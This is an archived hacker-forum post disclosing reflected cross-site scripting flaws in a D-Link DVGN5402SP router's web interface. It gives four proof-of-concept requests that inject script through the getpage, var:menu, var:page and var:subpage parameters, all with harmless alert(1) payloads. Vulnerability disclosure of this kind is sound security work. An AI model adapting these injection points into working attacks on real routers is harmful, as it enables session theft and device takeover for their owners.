DLINK DVGN5402SP XSS跨站漏洞

90_ 发表于 2016-2-24 18:17:52

exp

Vulnerability
-------------

Reflected Cross Site Scripting

1) getpage parameter

GET /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced1337"%3balert(1)%2f%2f158&var:page=firewall&var:subpage=URLFilter HTTP/1.1

2) var:menu parameter

GET /cgi-bin/webproc?getpage=html/index.html&errorpage=html/main.html&var:language=zh_cn&var:menu=setup1337"%3balert(1)%2f%2f122&var:page=connected&var:retag=1&var:subpage=- HTTP/1.1

3) var:page parameter

/cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=firewall9542"%3balert(1)%2f%2f198&var:subpage=dmz

4) var:subpage parameter

/cgi-bin/webproc?getpage=html/index.html&errorpage=html/main.html&var:language=zh_cn&var:menu=setup&var:page=connected&var:retag=1&var:subpage="><script>alert(1)<%2fscript>z376l HTTP/1.1

我叫齐齐 发表于 2016-2-25 10:15:52

膜拜中

页: [1]

红客联盟 - 由08安全团队运营's Archiver

DLINK DVG­N5402SP XSS跨站漏洞

DLINK DVGN5402SP XSS跨站漏洞